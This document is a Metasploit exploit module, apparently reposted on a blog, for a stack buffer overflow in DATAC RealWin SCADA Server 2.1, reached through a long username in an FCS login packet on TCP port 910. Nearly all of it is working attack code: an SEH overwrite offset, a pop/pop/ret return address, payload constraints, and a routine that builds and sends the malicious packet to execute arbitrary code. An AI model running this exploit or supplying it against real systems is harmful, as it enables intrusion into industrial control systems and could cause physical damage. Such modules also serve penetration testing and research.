##
# $Id: realwin_on_fcs_login.rb 13007 2011-06-22 22:36:55Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##
require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'RealWin SCADA Server DATAC Login Buffer Overflow'
,
'Description'
=> %q{
This
module
exploits a stack buffer overflow
in
DATAC
Control
International RealWin
SCADA
Server
2
.
1
(Build
6
.
0
.
10
.
10
)
or
earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN
packet containing a long username, an attacker may be able to
execute arbitrary code.
},
'Author'
=>
[
'Luigi Auriemma'
,
#discovery
'MC'
,
'B|H '
],
'License'
=>
MSF_LICENSE
,
'Version'
=>
'$Revision: 13007 $'
,
'References'
=>
[
[
'URL'
,
'http://aluigi.altervista.org/adv/realwin_2-adv.txt'
],
[
'URL'
,
'http://www.dataconline.com/software/realwin.php'
],
],
'Privileged'
=>
true
,
'DefaultOptions'
=>
{
'EXITFUNC'
=>
'thread'
,
},
'Payload'
=>
{
'Space'
=>
450
,
'BadChars'
=>
"\x00\x20\x0a\x0d"
,
'StackAdjustment'
=> -
3500
,
},
'Platform'
=>
'win'
,
'Targets'
=>
[
[
'Universal'
,
{
'Offset'
=>
392
,
# Offset to SEH
'Ret'
=> 0x40012540,
# pop/pop/ret @FlexMLang.dll
}
],
],
'DefaultTarget'
=>
0
,
'DisclosureDate'
=>
'Mar 21 2011'
))
register_options([Opt::
RPORT
(
910
)],
self
.
class
)
end
def
exploit
data = [0x67542310].pack(
'V'
)
data << [0x00000824].pack(
'V'
)
data << [0x00110011].pack(
'V'
)
data <<
"\x01\x00"
data << rand_text_alpha_upper(target[
'Offset'
])
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(
17706
- payload.encoded.length)
data << [0x451c3500].pack(
'V'
)
data << [0x00000154].pack(
'V'
)
data << [0x00020040].pack(
'V'
)
connect
print_status(
"Trying target #{target.name}..."
)
sock.put(data)
select(
nil
,
nil
,
nil
,
0
.
5
)
handler
disconnect
end
end
No comments:
Post a Comment